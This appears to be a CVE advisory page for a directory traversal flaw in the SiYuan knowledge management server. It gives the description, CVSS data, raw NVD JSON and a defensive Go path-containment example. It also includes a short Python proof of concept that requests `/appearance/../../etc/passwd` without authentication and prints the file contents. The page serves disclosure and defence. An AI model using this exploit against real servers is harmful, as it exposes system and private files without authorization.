Security Vulnerability Report
CVE-2026-33476 CVSS 7.5 HIGH

Published: 2026-03-20 23:16:48
Last Modified: 2026-03-23 22:16:31

Description

SiYuan is a personal knowledge management system. Prior to version 3.6.2, the SiYuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath`. Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.
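
A hardened counterpart to the flaw described above, as an added example that is not SiYuan's code or its actual 3.6.2 patch: a lexical containment check in Go (the language of the SiYuan kernel) for a file-serving route, next to the weak join it replaces. The base directory, the function names `naiveResolve` and `safeResolve`, and the request paths are constructed for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrTraversal is returned when a requested path resolves outside the base directory.
var ErrTraversal = errors.New("path escapes base directory")

// naiveResolve shows the weak pattern: Join cleans the result, so "../"
// segments in the request silently climb out of base.
func naiveResolve(base, requested string) string {
	return filepath.Join(base, requested)
}

// safeResolve joins requested onto base and rejects any result outside base.
// Comparing via Rel (not a string prefix) also rejects sibling directories
// such as "appearance-backup". The check is lexical; it does not follow symlinks.
func safeResolve(base, requested string) (string, error) {
	base = filepath.Clean(base)
	full := filepath.Join(base, requested)
	rel, err := filepath.Rel(base, full)
	if err != nil {
		return "", ErrTraversal
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrTraversal
	}
	return full, nil
}

func main() {
	base := "/srv/siyuan/appearance" // constructed base directory (assumption)
	for _, req := range []string{ // constructed request paths
		"themes/daylight/theme.css",
		"../../etc/passwd",
		"../appearance-backup/secret",
		"icons/../../conf/conf.json",
	} {
		p, err := safeResolve(base, req)
		fmt.Printf("%-32q naive=%-42q safe=%q err=%v\n", req, naiveResolve(base, req), p, err)
	}
}
```

Where symlinks can exist inside the served directory, resolve them (for example with `filepath.EvalSymlinks`) before running the comparison, and keep the route behind the same authentication checks as the rest of the API.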

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:* - VULNERABLE
SiYuan < 3.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_poc(target_url):
    """
    PoC for CVE-2026-33476: SiYuan Directory Traversal
    Attempts to read /etc/passwd from the target server.
    """
    # The vulnerable endpoint is /appearance/*filepath
    # Using ../ to traverse back to the root directory
    traversal_payload = "/appearance/../../etc/passwd"
    full_url = f"{target_url.rstrip('/')}{traversal_payload}"

    headers = {
        "User-Agent": "CVE-2026-33476-Scanner"
    }

    try:
        print(f"[+] Sending request to: {full_url}")
        response = requests.get(full_url, headers=headers, timeout=10)

        if response.status_code == 200:
            print("[+] Exploit successful! Server responded with 200 OK.")
            print("[+] File content snippet:")
            print(response.text[:500])  # Print first 500 chars
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            if response.status_code == 404:
                print("[-] File not found or patch applied.")
            elif response.status_code == 401 or response.status_code == 403:
                print("[-] Authentication required or access denied (Patch may be applied).")
    except requests.exceptions.RequestException as e:
        print(f"[!] Connection error: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://127.0.0.1:6806"
    exploit_poc(target)
```

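References

https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a (Patch)
https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7 (Exploit, Vendor Advisory)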

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33476",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T23:16:48.137",
    "lastModified": "2026-03-23T22:16:31.057",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue."},
      {"lang": "es", "value": "SiYuan es un sistema de gestión de conocimiento personal. Antes de la versión 3.6.2, el kernel de Siyuan expone un endpoint de servicio de archivos no autenticado bajo `/appearance/*filepath.` Debido a una sanitización de ruta inadecuada, los atacantes pueden realizar salto de directorio y leer archivos arbitrarios accesibles al proceso del servidor. Las comprobaciones de autenticación excluyen explícitamente este endpoint, permitiendo la explotación sin credenciales válidas. La versión 3.6.2 corrige este problema."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-22"},
          {"lang": "en", "value": "CWE-73"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "27CB71A7-7208-417A-AE6D-266D57F683E9"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]},
      {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}
    ]
  }
}
```